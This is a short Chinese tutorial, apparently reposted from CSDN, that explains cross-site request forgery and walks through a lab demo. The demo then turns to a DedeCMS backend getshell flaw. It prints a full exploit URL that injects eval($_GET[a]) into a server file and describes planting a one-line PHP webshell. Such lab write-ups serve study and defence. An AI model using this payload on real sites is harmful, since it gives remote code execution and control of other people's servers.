CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装成受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性。
CSRF的成因就是网站的cookie在浏览器中不会过期,只要不关闭浏览器或者退出登录,以后访问这个网站,都会默认你已经登录状态,而在这个期间,共计者发送构造好的csrf脚本或包含csrf链接,可能会执行一些用户不想做的功能(比如添加账号),说白了就是借用别人的cookie,去发送命令。
靶场演示
来到留言板,留言抓包
右键点击
生成的文件保存下来,点击提交
留言成功。
这里我搭建了一个dede_cms的网站
这个cms有一个后台getshell的漏洞。
原文
http://localhost/dedecms/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//
使用这里的payload
连接一句话木马
检查是否成功
file_put_contents
然后想服务器插入一句话木马文件
插入成功
成功拿到webshell
来源:CSDN
作者:mochu7777777
链接:https://blog.csdn.net/mochu7777777/article/details/104570821